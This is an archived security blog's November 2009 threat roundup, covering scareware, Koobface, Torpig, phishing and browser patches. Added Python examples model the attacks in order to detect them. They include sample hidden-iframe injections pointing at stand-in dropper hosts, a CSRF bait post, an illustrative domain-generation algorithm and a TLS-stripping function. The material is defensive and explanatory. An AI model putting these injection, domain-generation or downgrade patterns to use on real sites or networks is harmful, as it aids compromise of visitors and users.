This Month in the Threat Webscape

12.07.2009 - 5:27 PM

Update 12/14/2009: Added email stats/charts (sorry, a little late this month!)

Month of November 2009

Major hits

A fake-blog campaign that has compromised over a million sites is pushing scareware. The compromised sites carry automatically generated content designed to rank in search-engine results. When a user clicks one of those results, he or she is redirected to a fake anti-virus site that displays bogus findings from a purported scan of the user's computer and prompts the user to run an executable. The redirect fires only if the visitor arrives via Google, Yahoo, Live, AltaVista or Baidu; a direct visit to the same page shows only the innocuous filler content, which keeps the campaign out of sight of anyone checking the site by hand.
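
The referer-keyed behaviour is the part a responder has to account for when checking a reported site: fetching the URL from a terminal will show nothing. The following added example (ours, not the campaign's code) models the cloaked page and the check against it. The search-engine list comes from the text; matching on a hostname label, and the placeholder redirect target, are assumptions.

```python
from urllib.parse import urlparse

# Search engines the campaign keys on (from the text). Matching on a hostname
# label is an assumption about how the cloaking script identified them.
SEARCH_ENGINES = ("google", "yahoo", "live", "altavista", "baidu")


def is_search_engine_referer(referer):
    """True if the Referer header names one of the search engines above."""
    if not referer:
        return False
    host = (urlparse(referer).hostname or "").lower()
    return any(label in SEARCH_ENGINES for label in host.split("."))


def cloaked_page(referer):
    """Model of a compromised page: keyword filler for crawlers and direct
    visits, a redirect to the scareware site only for search-referred visitors.
    The redirect target is a placeholder, not a domain from the campaign."""
    if is_search_engine_referer(referer):
        return ("302", "http://fake-av-scan.invalid/scan.php")
    return ("200", "<html><body>autogenerated keyword text about celebrity news</body></html>")


def honest_page(referer):
    """A site that is not cloaked answers everyone the same way."""
    return ("200", "<html><body>same content for every visitor</body></html>")


def cloaking_check(fetch, referers=(
        "http://www.google.com/search?q=free+video",
        "http://search.yahoo.com/search?p=free+video",
        "http://search.live.com/results.aspx?q=free+video")):
    """Fetch the page once with no Referer and once per search-engine Referer;
    report which referers produced a response different from the direct visit.
    `fetch(referer)` must return a (status, body) tuple."""
    baseline = fetch(None)
    return {ref: fetch(ref) != baseline for ref in referers}
```

Against a live site, `fetch` would be a thin wrapper that performs the HTTP request with the given `Referer` header (and a browser-like `User-Agent`) and returns the status and body; any referer for which the result is `True` is one the site treats differently from a direct visit.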

Some pages on michaeljackson.com were compromised via JavaScript injection, although in this case visitors were not redirected to malware.

The official Web site of the Singapore Foreign Exchange Market was compromised: an injected iframe redirector led visitors to a page that drops a malicious file onto the victim's computer.

A major online ad site, media-servers.net, was compromised. The injected code served up an exploit cocktail that tried vulnerabilities in Microsoft DirectShow, Microsoft Snapshot Viewer, MDAC, AOL ConvertFile(), Adobe Reader and Adobe Acrobat in turn. The ads actually served from ad.media-servers.net were not affected.

A scareware campaign was launched by miscreants who bought Google sponsored ads in an attempt to hijack popular searches.
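
Three of the items above are the same mechanism: an iframe or script injected into an otherwise legitimate page. The added example below (ours, not from any of the affected sites) is the kind of scan a responder runs over saved HTML to spot such injections; it flags iframes that are invisible and also decodes the `document.write(unescape("%3Ciframe..."))` construction that injected code commonly uses to dodge a plain text search. The sample page and its domains are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# document.write(unescape("%3Ciframe ...")) hides an injected iframe from a
# naive grep; we percent-decode those payloads and scan them too.
UNESCAPE_RE = re.compile(r"""unescape\(\s*["']([^"']+)["']\s*\)""")
OFFSCREEN_RE = re.compile(r"(?:left|top):-\d{3,}")


class InjectedIframeFinder(HTMLParser):
    """Collect <iframe> tags that are invisible: zero/one pixel in size,
    hidden by CSS, or positioned far off-screen."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        style = a.get("style", "").replace(" ", "").lower()
        reasons = []
        if a.get("width", "").strip() in ("0", "1") or a.get("height", "").strip() in ("0", "1"):
            reasons.append("zero-size")
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden-by-css")
        if OFFSCREEN_RE.search(style):
            reasons.append("off-screen")
        if reasons:
            self.findings.append((a.get("src", ""), reasons))


def find_injected_iframes(html):
    """Return [(src, [reasons...])] for suspicious iframes in the markup,
    including ones written via document.write(unescape(...))."""
    finder = InjectedIframeFinder()
    finder.feed(html)
    for payload in UNESCAPE_RE.findall(html):
        finder.feed(unquote(payload))
    finder.close()
    return finder.findings


# Constructed sample page: one legitimate embedded video plus two injected frames.
SAMPLE_PAGE = """<html><body>
<h1>Market data</h1>
<iframe src="http://video.example/embed/123" width="425" height="344"></iframe>
<iframe src="http://redirector.invalid/in.cgi?3" width=0 height=0 style="visibility: hidden"></iframe>
<script type="text/javascript">
document.write(unescape("%3Ciframe%20src%3D%22http%3A//dropper.invalid/x.php%22%20width%3D1%20height%3D1%3E%3C/iframe%3E"));
</script>
</body></html>"""
```

The visible video embed is left alone; the 0x0 frame and the one hidden inside `unescape()` are both reported with the reason they were flagged, which is what you want to hand to whoever is cleaning the site.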

Web 2 dot uh-oh

The Torpig botnet is using what appears to be a novel technique for evading takedown. It computes its drive-by-download domain by combining the current date with search-trend data pulled from Twitter, so the rendezvous domain cannot be predicted (and therefore pre-registered or blocked) until that day's trend data exists. A more in-depth analysis of the botnet can be found here.
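
To make the date-plus-trend idea concrete, here is an added example of a generator in that shape together with the defender's side of it. It is our illustration, not Torpig's actual algorithm: the hash, the letter mapping, the TLD list and the BIND-style DNS log lines are all assumptions constructed for the example.

```python
import hashlib
from datetime import date

# Illustrative generator in the shape the text describes (date + a trending
# term -> a small set of rendezvous domains). NOT Torpig's real algorithm;
# the mixing function and TLD list are assumptions.
TLDS = ("com", "net", "biz")
ALPHABET = "abcdefghijklmnop"  # 16 letters so each hex nibble maps to one


def dga_domains(day, trend, count=3):
    """Deterministically derive `count` candidate domains from a date and a trend term."""
    seed = f"{day.isoformat()}|{trend.strip().lower()}"
    domains = []
    for i in range(count):
        digest = hashlib.md5(f"{seed}|{i}".encode()).hexdigest()
        label = "".join(ALPHABET[int(c, 16)] for c in digest[:10])
        domains.append(f"{label}.{TLDS[i % len(TLDS)]}")
    return domains


def expected_domains(day, trends):
    """Defender's view: every domain the bots could try today, given the trend
    terms observed today. Tomorrow's set cannot be computed until tomorrow's
    trends exist, which is what makes pre-registration hard."""
    found = set()
    for t in trends:
        found.update(dga_domains(day, t))
    return found


def match_dns_log(lines, day, trends):
    """Flag resolver queries for any domain in today's expected set.
    Expects BIND-style lines: 'client 10.0.0.5#53210: query: foo.com IN A'."""
    watch = expected_domains(day, trends)
    hits = []
    for line in lines:
        parts = line.split()
        if "query:" in parts:
            qname = parts[parts.index("query:") + 1].rstrip(".").lower()
            if qname in watch:
                hits.append((parts[1].split("#")[0], qname))
    return hits


def sample_dns_log(day, trend):
    """Constructed log: one query for a generated domain, two for unrelated names."""
    generated = dga_domains(day, trend)[1]
    return [
        "client 10.0.0.5#53210: query: www.example.com IN A",
        f"client 10.0.0.9#40111: query: {generated} IN A",
        "client 10.0.0.5#53211: query: mail.example.com IN MX",
    ]
```

Once the generator is known, the defender's job reduces to pulling the same trend terms the bots see and re-running it each day; the example shows that loop end to end, from term to domain set to a hit in resolver logs.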

The Koobface worm writers were busy this month. Among their exploits:
  • Getting into the holiday spirit by switching to a Christmas theme. The botnet also experimented with serving client-side exploits, though that approach appears to have been abandoned for now.
  • Using Google Reader to host pages that in turn host fake videos prompting the user to install malware.
  • Attempting to force users of infected computers to break Facebook CAPTCHAs. Users are presented with a dialog that threatens to shut down their computer if they do not complete a CAPTCHA.
  • Their most recent update is a "visual social engineering element": a descriptive domain name appended to the original link after a question mark, e.g. bit.ly/588dmE?YOUTUBE.COM/ea05981d43. The link appears to lead to YouTube, but the text after the "?" is only a query string and does not change which site the short link resolves to. To help protect against these types of attacks, bit.ly has recently partnered with Websense.
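
The decoy-domain trick works because people read the longest familiar-looking part of a link rather than the part a browser actually connects to. The added example below (ours, not bit.ly's or Websense's code) splits a link the way a browser does and reports any domain-looking text that is not the real host. It goes one step beyond the text and also catches the older userinfo form (`http://trusted.com@evil/...`), where the decoy sits before an `@`; the TLD list is an assumption.

```python
import re
from urllib.parse import urlsplit

# Anything that looks like a registrable hostname sitting after the real host.
DOMAIN_LIKE = re.compile(r"(?i)\b([a-z0-9-]+(?:\.[a-z0-9-]+)*\.(?:com|net|org|info|biz))\b")


def real_host(url):
    """The host a browser would actually connect to. A scheme-less link such as
    'bit.ly/588dmE?...' is treated as http, as an address bar would."""
    if "://" not in url:
        url = "http://" + url
    return (urlsplit(url).hostname or "").lower()


def decoy_domains(url):
    """Domain-looking text in the path/query/fragment, or in the userinfo part
    (http://trusted.com@evil/...), that is not the real host."""
    if "://" not in url:
        url = "http://" + url
    p = urlsplit(url)
    host = (p.hostname or "").lower()
    tail = p.path + ("?" + p.query if p.query else "") + ("#" + p.fragment if p.fragment else "")
    candidates = [m.lower() for m in DOMAIN_LIKE.findall(tail)]
    if p.username:
        candidates.append(p.username.lower())
    return [c for c in candidates if c != host]


def looks_like_decoy(url):
    """True when the link carries a brand-name domain that is not where it goes."""
    return bool(decoy_domains(url))
```

For the Koobface link the real host comes back as `bit.ly` and `youtube.com` is reported as the decoy; a genuine YouTube link reports nothing.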

A PHP script that brute-forces the passwords of WordPress accounts has been found in the wild. It works in a distributed manner: many copies run on different hosts and connect to a central MySQL database to keep track of which credentials have already been tried.
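
The distributed design is what matters to a WordPress administrator: each participating host may try a password only once or twice, so a per-IP lockout never fires. The added example below (ours, not the script in question) looks at an access log from the other side and raises both the obvious single-IP signal and the quieter many-IPs-one-try-each signal. The Apache combined-format lines are constructed for the example; the thresholds are assumptions to tune per site.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Apache/nginx combined log format; only the fields we need are captured.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path.split("?")[0], int(status)


def login_attempts(lines):
    """Yield (ip, time, status) for POSTs to wp-login.php; GETs only render the form."""
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3].endswith("/wp-login.php"):
            yield rec[0], rec[1], rec[4]


def detect_bruteforce(lines, window=timedelta(minutes=10), per_ip=5, distributed_ips=20):
    """Two signals per time window: one IP hammering the login, and many IPs
    each trying only once or twice. WordPress answers a successful login with
    a 302 to wp-admin, so a 302 from an IP that also produced failures gets
    its own alert."""
    buckets = defaultdict(list)
    for ip, ts, status in login_attempts(lines):
        buckets[int(ts.timestamp() // window.total_seconds())].append((ip, status))
    alerts = []
    for b, events in sorted(buckets.items()):
        per = Counter(ip for ip, _ in events)
        noisy = sorted(ip for ip, n in per.items() if n >= per_ip)
        quiet_ips = [ip for ip, n in per.items() if n <= 2]
        distributed = len(quiet_ips) >= distributed_ips
        successes = sorted({ip for ip, st in events if st == 302 and per[ip] > 1})
        if noisy or distributed or successes:
            alerts.append({"window": b, "noisy_ips": noisy, "distributed": distributed,
                           "quiet_ip_count": len(quiet_ips), "success_after_failures": successes})
    return alerts


def sample_log():
    """Constructed access log: ten minutes on one site with a legitimate GET,
    three loud IPs, 25 one-shot IPs and a success from one of the loud IPs."""
    lines = ['203.0.113.7 - - [15/Nov/2009:03:00:01 +0000] "GET /wp-login.php HTTP/1.1" 200 1234']
    t = 0
    for ip in ("198.51.100.10", "198.51.100.11", "198.51.100.12"):
        for _ in range(6):
            t += 1
            lines.append(f'{ip} - - [15/Nov/2009:03:{t // 60:02d}:{t % 60:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 3000')
    for i in range(25):
        t += 1
        lines.append(f'192.0.2.{i + 1} - - [15/Nov/2009:03:{t // 60:02d}:{t % 60:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 3000')
    lines.append('198.51.100.11 - - [15/Nov/2009:03:02:59 +0000] "POST /wp-login.php HTTP/1.1" 302 0')
    return lines
```

The per-IP count alone would miss the 25 hosts that each posted once; counting distinct low-volume sources against the same endpoint in the same window is what exposes the coordinated run.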

Facebook fell victim to a worm that spreads via Cross-Site Request Forgery (CSRF). All a user has to do to fall prey is click a link (next to a titillating photo of a young lady) on a friend's wall, titled "click da' button, baby!"; the user's own browser then posts the same bait to the user's wall.
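
What makes a CSRF worm possible is a write endpoint that trusts the session cookie alone, since the browser attaches that cookie to any request, including one an attacker's page triggers. The added example below (ours, not Facebook's code) models a wall-post endpoint in its vulnerable and hardened forms; the site origin and the bait text are assumptions.

```python
import hmac
import secrets

SITE_ORIGIN = "http://social.example"  # assumption: the site being attacked


class WallApp:
    """Minimal wall-posting backend. The browser sends the session cookie
    (sid) with every request to the site, including ones an attacker's page
    causes it to make."""

    def __init__(self):
        self.sessions = {}
        self.wall = []

    def login(self, user):
        sid = secrets.token_hex(16)
        self.sessions[sid] = {"user": user, "csrf": secrets.token_hex(16)}
        return sid

    def form_token(self, sid):
        """Embedded in the site's own wall form; an attacker's page never sees it."""
        return self.sessions[sid]["csrf"]

    def post_vulnerable(self, sid, form):
        """Trusts the cookie alone: any page that can make the browser POST here wins."""
        sess = self.sessions.get(sid)
        if not sess:
            return 403
        self.wall.append((sess["user"], form["message"]))
        return 200

    def post_hardened(self, sid, form, origin=None):
        """Requires the per-session token and, when the browser sends one, a matching Origin."""
        sess = self.sessions.get(sid)
        if not sess:
            return 403
        if not hmac.compare_digest(form.get("csrf_token", ""), sess["csrf"]):
            return 403
        if origin is not None and origin != SITE_ORIGIN:
            return 403
        self.wall.append((sess["user"], form["message"]))
        return 200


def worm_attempt(app, victim_sid, hardened):
    """The attacker's page auto-submits a wall post from the victim's browser.
    It chooses the message but cannot read the victim's token."""
    bait = {"message": "click da' button, baby! http://attacker.invalid/bait"}
    if hardened:
        return app.post_hardened(victim_sid, bait, origin="http://attacker.invalid")
    return app.post_vulnerable(victim_sid, bait)


def legitimate_post(app, sid, message):
    """The site's own form carries the token and is submitted from the site's origin."""
    form = {"message": message, "csrf_token": app.form_token(sid)}
    return app.post_hardened(sid, form, origin=SITE_ORIGIN)
```

The token check is the one that matters (the Origin header was not sent by every browser of the period, so it can only be an extra check, not the sole one); the constant-time comparison avoids leaking the token byte by byte through timing.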

Browsing for dirt

Another "silent patch" has been distributed by Google for its Chrome browser after the discovery of a pair of vulnerabilities. Details of both are being withheld until a majority of users have the fix. One of the two was rated "high-risk" because it allows arbitrary code execution.

Two security holes are bad, but three is surely worse. Opera released the newest version of its browser, 10.10, patching three "extremely severe" vulnerabilities: a heap buffer overflow, the leaking of error messages to unrelated sites, and an undisclosed third one. We're wondering what that one was about.

If two is bad and three worse, what can we say about seven? Exactly that many security flaws have been patched in the newest Apple Safari, 4.0.4. Users on both Windows and Mac OS X were exposed to a wide range of attacks.

Several security flaws have been patched in the newest version of Adobe Shockwave Player, including a “run malicious code” bug and other similarly juicy ones.

We have already had two, three, seven and several holes, but how about 50? To be more precise, 50 million files have been exposed to potential leakage of sensitive information due to a Microsoft bug in the Internet Explorer PDF export function: every document it generates reveals the source file's full storage path in the PDF. What else have we to ask for?

Microsoft

Microsoft issued six security bulletins with fixes for a total of 15 vulnerabilities on Patch Tuesday, November 10th. Three of them were tagged "Critical". MS09-065 deserves special attention: a specially crafted Embedded OpenType (EOT) font allows remote code execution if a user views content rendered with it. A proof-of-concept exploit has already been added to the Metasploit framework. Although the code only triggers a BSOD for now, researchers expect it to reach reliable code execution very soon.

And the new Windows 7 does not seem very safe either. A recent test found that 8 of 10 malware samples ran unhindered under the default User Account Control (UAC) setting. Microsoft has also confirmed an SMB exploit that causes a denial of service on Windows 7 and Windows Server 2008 R2.

There is also a zero-day exploit affecting IE 6 and 7 on fully patched Windows XP SP3 systems. It is triggered when certain CSS/STYLE objects are retrieved via the "getElementsByTagName()" method, and an attacker can execute arbitrary code by tricking a user into visiting a maliciously crafted web page.

Hello ThreatSeeker. You've got mail!

[Email statistics charts for November 2009 (added in the 12/14/2009 update) are not reproduced in this archived copy.]

So long, and thanks for all the phish

A Visa phishing campaign targets holiday shoppers who buy gifts online. The attack exploits the "Verified by Visa" program, which gives shoppers an additional layer of safety and assures merchants that the large transactions typical of the holidays are legitimate, so purchases are approved quickly without triggering fraud alerts.

The phishing email redirects the victim to a spoofed page that harvests all the information the victim provided to the card-issuing bank when signing up for the credit card.

PandaLabs has warned of a Facebook phishing attempt that harvests Facebook credentials. Once the victim enters a username and password, he or she is redirected to an error message claiming an "incorrect email/password combination".

Security Trends

The first iPhone worm was launched at the beginning of November in Australia. The worm, written by a hacker calling himself "ikee", changes the lock-screen wallpaper to an image of Rick Astley on any iPhone that has SSH installed and still uses the default root password. A more malicious hacker could take the code written by ikee and adapt it to carry a more sinister payload.

Man-in-the-middle attacks against smartphones over insecure Wi-Fi networks are taking place everywhere. An attacker on the same public Wi-Fi network can use the publicly available sslstrip tool to downgrade a smartphone's HTTPS connections to plain HTTP and read the traffic whenever the owner accesses a Web site over that network.
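
sslstrip does not break TLS; it sits between the victim and the site, speaks TLS to the site and plaintext to the victim, and rewrites every `https://` reference it relays so the victim's browser never asks for TLS. The added example below (ours, not the sslstrip tool's code) models that rewrite on a constructed response, adds the client-side check a practitioner would want (password forms whose action is plain http), and shows why a browser that already remembers an HSTS policy for the host is not fooled. The host and page content are constructed for the example.

```python
import re

FORM_RE = re.compile(r"<form\b[^>]*\baction=[\"']([^\"']+)[\"'][^>]*>(.*?)</form>", re.I | re.S)


def strip_tls(status, headers, body):
    """Model of what an sslstrip-style proxy does to a response it relays to
    the victim: every https:// reference becomes http://, so the victim's
    browser keeps talking plaintext to the proxy while the proxy talks TLS to
    the real site. (Illustrative; not the sslstrip tool's own code.)"""
    out = dict(headers)
    if out.get("Location", "").startswith("https://"):
        out["Location"] = "http://" + out["Location"][len("https://"):]
    # A first-time visitor must never learn the site's HSTS policy.
    out.pop("Strict-Transport-Security", None)
    return status, out, body.replace("https://", "http://")


def insecure_login_forms(body):
    """Client-side check: forms with a password field whose action is plain http."""
    bad = []
    for action, inner in FORM_RE.findall(body):
        if action.startswith("http://") and re.search(r"type=[\"']?password", inner, re.I):
            bad.append(action)
    return bad


def client_will_use_https(url, hsts_hosts):
    """A browser that already remembers an HSTS policy for the host upgrades a
    stripped http link itself, defeating the downgrade for that host."""
    scheme, rest = url.split("://", 1)
    host = rest.split("/", 1)[0].lower()
    return scheme == "https" or host in hsts_hosts


# Constructed response from a hypothetical banking site.
SAMPLE_RESPONSE = (
    200,
    {"Content-Type": "text/html", "Strict-Transport-Security": "max-age=31536000"},
    '<html><body><a href="https://bank.example/">Bank</a>'
    '<form action="https://bank.example/login" method="post">'
    '<input name="user"><input name="pw" type="password"></form></body></html>',
)
```

The downgrade succeeds only against a browser that has never seen the site's policy; that is why the first connection over untrusted Wi-Fi is the dangerous one, and why typing `https://` explicitly (or not logging in at all on public networks) was the practical advice at the time.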

To wrap it up: "ransomware" typically encrypts some of the user's personal files or locks the display at system startup. Now users may stumble upon a new variant that blocks Internet access until a fee is paid via SMS.



Thanks to the following contributors for this month's roundup:

- Sebastian Becerra (Security & Technology Research)
- Lei Li (Security & Technology Research)
- Ulysses Wang (Security & Technology Research)
- Ivan Sabo (Security & Technology Research)
- Saeed Abu-Nimeh (Security & Technology Research)
- Jay Liew (Security & Technology Research)
